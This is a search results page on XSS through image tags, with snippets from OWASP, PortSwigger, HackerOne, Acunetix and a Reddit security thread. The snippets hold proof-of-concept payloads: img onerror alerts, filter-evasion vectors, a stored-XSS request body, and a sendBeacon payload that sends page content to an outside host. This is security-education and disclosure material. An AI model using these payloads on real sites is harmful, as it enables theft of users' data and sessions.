OWASP Cheat Sheet Series
cheatsheetseries.owasp.org › cheatsheets › XSS_Filter_Evasion_Cheat_Sheet.html
XSS Filter Evasion - OWASP Cheat Sheet Series
Null chars also work as XSS vectors ... and helped me bypass certain real world filters with a variation on this example: perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out...
Mozilla
developer.mozilla.org › en-US › docs › Web › Security › Attacks › XSS
Cross-site scripting (XSS) - Security | MDN
Hello, <img src=x onerror=alert('XSS!')>! One of the most important parts of preventing XSS attacks is to use a well-regarded templating engine which performs robust output encoding, and read its documentation to understand any caveats about the protection it offers.
XSS via Javascript/Data URI in img src attribute - does it work?
I found this page but looks like it’s been removed now so here is it from wayback machine: https://web.archive.org/web/20190905210402/https://www.owasp.org/index.php/Script_in_IMG_tags It says it works on IE 6. More on reddit.com
2
3
February 3, 2020How is the HTML tag img/src/onerror parsed?
Back in the day, making sense out of broken HTML was a feature, not a bug. And because everything needs to be backwards compatible with the mistakes of early 90s, even today web browsers do their best to extract some kind of valid elements from malformed tags. The browser sees . Because this attribute is an event callback, everything between = and > is treated as JavaScript code for that event, and the invalid syntax inside parentheses is treated as if you meant it as a single string. So ultimately, gets interpreted as if it was (tested on Firefox 127, YMMV). You're not in the realm of HTML specification anymore, you're in the realm of browser hacks that exist explicitly for the purpose of handling non-spec-compliant pages. More on reddit.com
1
2
June 21, 2024Is there any XSS payload/way to exploit this CSP policy ?
https://csp-evaluator.withgoogle.com/ https://imgur.com/sMdJXtU Those findings would be the vectors I'd explore. Sorry that it's just a link, but they say it as well as I could :) More on reddit.com
6
1
July 4, 2023How can an img tag with src attribute impact the security.
Can you confirm any events are allowed? If you can do things like onMouseMove you can create an “a” element for a hyperlink and use CSS to make it the whole height and width of the page, which when combined with a mouse move event will trigger. Really depends on the actual context you have injection though.. need to find something that’s allowed. Good luck. More on reddit.com
13
3
July 31, 2024How does XSS work?
In a Cross-site Scripting attack (XSS), the attacker uses your vulnerable web page to deliver malicious JavaScript to your user. The user’s browser executes this malicious JavaScript on the user’s computer. Note that about one in three websites is vulnerable to Cross-site scripting.
Learn more about the current state of web security.
acunetix.com
acunetix.com › websitesecurity › cross-site-scripting
What is Cross-site Scripting (XSS): prevention and fixes
How to discover Cross-site Scripting?
To discover Cross-site Scripting, you may either perform manual penetration testing or first use a vulnerability scanner. If you use a vulnerability scanner, it will save you a lot of time and money because your penetration testers can then focus on more challenging vulnerabilities.
Find out why it’s good to scan for vulnerabilities before hiring pen testers.
acunetix.com
acunetix.com › websitesecurity › cross-site-scripting
What is Cross-site Scripting (XSS): prevention and fixes
Why is Cross-site Scripting dangerous?
Even though a Cross-site Scripting attack happens in the user’s browser, it may affect your website or web application. For example, an attacker may use it to steal user credentials and log in to your website as that user. If that user is an administrator, the attacker gains control over your website.
See an example of a dangerous XSS attack from the past
acunetix.com
acunetix.com › websitesecurity › cross-site-scripting
What is Cross-site Scripting (XSS): prevention and fixes
HackerOne
hackerone.com › reports › 894876
Nextcloud disclosed on HackerOne: XSS through image upload of...
This is a bypass of report #808287 Upload the attached file for the image of a contact, right click "Open image in new tab" and you will see the xss. ## Impact The person viewing the image of a contact can be victim of XSS.
YouTube
youtube.com › watch
Cross-Site Scripting (XSS) Explained - YouTube
🖤 Check out SuperTokens here: https://supertokens.com/❤️ Get 40% OFF CodeCrafters: https://app.codecrafters.io/join?via=the-coding-gopher💌 Business Inquiri...
Published September 29, 2025
Invicti
invicti.com › web-vulnerability-scanner › vulnerabilities › cross-site-scripting-via-file-upload
Cross-site Scripting via File Upload
Example content for Gif and Svg files for this kind of attacks are shared below:
YouTube
youtube.com › watch
Website Hacking Demos using Cross-Site Scripting (XSS) - it's just too easy! - YouTube
It's just too easy to attack websites using Cross Site Scripting (XSS). The XSS Rat demonstrates XSS attacks. XSS Rat explains and demos cross-site scripting...
Published April 29, 2022
Infosec Institute
infosecinstitute.com › resources › hacking › exploit-xss-image
How to exploit XSS with an image | Infosec
Then, let's inject our test script into the image with the following command (we will do the test with a gif image so that we will use the gif injector script ➔ The first one). This is just a simple payload that will show you a JavaScript alert with the message "Learn XSS with gif," but in a real scenario, an attacker will try to steal your cookie, inject hook (like BEeF one), redirect you to a malicious site such as:
HackerOne
hackerone.com › knowledge-center › how-xss-payloads-work-code-examples-and-how-prevent-them
How XSS Payloads Work with Code Examples, and How to Prevent Them | HackerOne
For example, angle brackets (< and >) are often used in XSS attacks to inject malicious code into a page, so output encoding would convert these characters into their HTML-encoded equivalents to prevent the browser from interpreting them as ...
Acunetix
acunetix.com › websitesecurity › cross-site-scripting
What is Cross-site Scripting (XSS): prevention and fixes
February 18, 2025 - <!-- background attribute --> <body background="javascript:alert("XSS")"> Some browsers execute JavaScript found in the <img> attributes.
Scribd
scribd.com › document › 419470930 › xss-INJECT
XSS Injection Examples and Alerts | PDF | Java Script
xss INJECT - Free download as Text File (.txt), PDF File (.pdf) or read online for free. The document contains multiple examples of JavaScript code injected into HTML tags and attributes that could be used for cross-site scripting attacks. The examples leverage various techniques to execute alert popups and other JavaScript code through the injection of scripts tags, JavaScript URLs in image and iframe sources, HTML entity encoding, and UTF-7 encoding.
Express
expressjs.com
Express - Node.js web application framework
const express = require('express') const app = express() const port = 3000 app.get('/', (req, res) => { res.send('Hello World!') }) app.listen(port, () => { console.log(`Example app listening on port ${port}`) })
Aikido
aikido.dev › home › articles › aikido attack finds multiple 0-days in hoppscotch
Aikido Attack Finds 0-Days in Hoppscotch
3 weeks ago - Example request body: { "query": "mutation($id:ID!,$title:String,$request:String){ updateRESTUserRequest(id:$id,title:$title,request:$request){ id title } }", "variables": { "id": "<REQUEST_ID>", "title": "addPet", "request": "{\"v\":\"16\",... , \"responses\":{\"XSS\":{\"name\":\"XSS\",\"status\":\"OK\",\"code\":200,\"headers\":[{\"key\":\"content-type\",\"value\":\"text/html\",\"active\":true,\"description\":\"\"}],\"body\":\"<img src=x onerror=\\\"console.log(424212069)\\\">\",\"originalRequest\":{\"v\":\"6\",\"name\":\"xss\",\"method\":\"GET\",\"endpoint\":\"<<mockUrl>>/xss\",\"params\":[],\"headers\":[],\"requestVariables\":[]}}}}" } } The XSS triggers once the user visits the mock API endpoint.
Reddit
reddit.com › r/asknetsec › xss via javascript/data uri in img src attribute - does it work?
r/AskNetsec on Reddit: XSS via Javascript/Data URI in img src attribute - does it work?
February 3, 2020 -
Hi all,
I recently identified an XSS vulnerability in an <img> tag where the reflection of a query parameter occurs in the src attribute.
URL: https://example.com?dir=123
Response:
<img src="123/tracking.gif">
I know the obvious payload is
x" onerror="alert(1)" y="
But it got me thinking if a Javascript or Data URI could be used so XSS could be achieved without quotes.
I've tried using payloads like javascript:alert(1);// and data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4= but it doesn't seem like they work. I'm not sure if javascript URI's can have comments. I'm also not sure if the trailing path of the gif would completely break any URI injection.
The OWASP XSS filter cheatsheet has numerous examples of "Image XSS using the JavaScript directive" featured: https://owasp.org/www-community/xss-filter-evasion-cheatsheet
However... I can't even get those to work by themselves.
When attempting to test the basic img URI payload: <img src="javascript:alert(1)">
-
Chrome throws a "
ERR_UNKNOWN_URL_SCHEME" in the console, no alert -
Firefox says "Could not load image" when reviewing the elements in Inspector, no alert
-
Edge and IE don't provide any additional clues, no alert
So can someone tell me:
-
Why does OWASP still say that xss via javascript URI in an img tag still works? (might have to send them an email to update the cheatsheet!)
-
What changed in modern browsers that prevents this payload from working?
-
Are there any URI XSS payloads that would work in my scenario or img tags general?
Thanks!
Top answer 1 of 2
2
I found this page but looks like it’s been removed now so here is it from wayback machine: https://web.archive.org/web/20190905210402/https://www.owasp.org/index.php/Script_in_IMG_tags It says it works on IE 6.
2 of 2
2
I don't think data URI's will help you here - it would require the browser to treat an html page as an image when used as the src of an image tag, and I don't think they ever do that (what is an iframe for, after all?) If it was an object/embed tag, using an SVG data URL instead would get you code execution, but it would be in its own origin rather than the parent page origin, so not really very useful (maybe if you really wanted BEEF running there in a relatively useless security context for some reason, but that's about it).
PortSwigger
portswigger.net › web-security › cross-site-scripting › dom-based
What is DOM-based XSS (cross-site scripting)? Tutorial & Examples | Web Security Academy
One of the simplest ways of doing this is to deliver your exploit via an iframe: <iframe src="https://vulnerable-website.com#" onload="this.src+='<img src=1 onerror=alert(1)>'"> In this example, the src attribute points to the vulnerable page ...
PortSwigger
portswigger.net › web-security › cross-site-scripting › contexts
Cross-site scripting contexts | Web Security Academy
For example, if the XSS context ... to break out of the existing JavaScript and execute your own: </script><img src=1 onerror=alert(document.domain)> The reason this works is that the browser first performs HTML parsing ...
PortSwigger
portswigger.net › web-security › cross-site-scripting › cheat-sheet
Cross-Site Scripting (XSS) Cheat Sheet - 2026 Edition | Web Security Academy
xmp <style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss> ... body <body onbeforeunload=navigator.sendBeacon('//ssl.portswigger-labs.net/',document.body.innerHTML)> ... track <video controls><source src=validvideo.mp4 type=video/mp4><track default oncuechange=alert(1) src="data:text/vtt,WEBVTT FILE 1 00:00:00.000 --> 00:00:05.000 <b>XSS</b> "></video>
Invicti
invicti.com › learn › cross-site-scripting-xss
Cross-Site Scripting (XSS) Vulnerability Guide
Learn why cross-site scripting (XSS) is still a real application security risk, what types of XSS exist, and how to find and prevent XSS vulnerabilities in your applications.
ThemeForest
themeforest.net › home › files › wordpress › ecommerce › woocommerce
Flatsome | Multi-Purpose Responsive WooCommerce Theme by UX-themes
Flatsome | Multi-Purpose Responsive WooCommerce Theme
Buy Flatsome | Multi-Purpose Responsive WooCommerce Theme by UX-themes on ThemeForest. Version 3.20.6 is out! (20.04.26). Click here to view the Changelog Always up to date! Compatible with the latest Wo... Version 3.20.6 is out! (20.04.26). Click here to view the Changelog Always up to date! Compatible with the latest WooCommerce and WordPress versions. Multi-Purpose Responsive WordPress & WooCommerce Theme with incredible User Experience Flatsome is the Best Selling WooCommerce Theme Ever Flatsome is the most used and t
Base64.Guru
base64.guru › home › base64 converter › base64 encode › image
PNG to Base64 | Image | Base64 Encode | Base64 Converter | Base64
I start writing the macro lilke this: MensajeHTML = MensajeHTML & "<img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAARsAAABUCAIAAAA9NgR7AAAACXBIWXMAAAsTAAALEwEAmp" MensajeHTML = MensajeHTML & "wYAAAAIGNIUk0AAHolAACAgwAA+f8AAIDoAABSCAABFVgAADqXAAAXb9daH5AAADKrSURBVHja7H15mB1Vmfd7zqn1rn" ...
Medium
infosecwriteups.com › all-about-file-upload-xss-c72c797aaba3
All about File upload XSS. Different ways to triggered XSS though… | by Xcheater | InfoSec Write-ups
January 18, 2024 - As we know many web application allows clients or their users to upload files for many different purposes and this is only the opportunity to find loopholes on them. so let’s see how to attack these entry points which allows files to upload there, for the purpose of finding XSS.